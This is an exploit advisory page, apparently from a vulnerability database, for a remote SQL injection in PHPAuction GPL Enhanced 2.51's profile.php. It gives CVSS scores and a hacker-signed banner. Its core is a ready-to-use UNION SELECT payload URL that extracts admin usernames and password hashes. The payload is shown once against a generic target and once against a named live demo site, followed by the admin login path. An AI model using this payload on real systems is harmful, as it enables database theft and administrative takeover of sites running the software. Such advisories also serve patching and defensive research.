PHPAuction GPL Enhanced 2.51 (profile.php) SQL Injection Vulnerability

2008.08.07
Credit: IRAQi
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

|___________________________________________________| | | PHPAuction GPL Enhanced V2.51 (profile.php id) Remote SQL Injection Vulnerability | |___________________________________________________ |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangel_g85[at]Yahoo[DoT]com | | |___________________________________________________ | | | | | script : http://phpauctions.info/ | | DorK : /:) |___________________________________________________| Exploit: www.[target].com/Script/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers-- L!VE DEMO: : http://phpauctions.info/phpauction/demo/profile.php?id=-19+union+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+PHPAUCTION_adminusers-- ___________________ admin login : www.[target].com/Script/admin/ ___________________ password : md5 ___________________ ____________________________( Greetz )____________________________ | | tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke | | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | |_________________________________________________________________ Im IRAQi

References:

http://www.securityfocus.com/bid/30501
http://www.milw0rm.com/exploits/6182


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top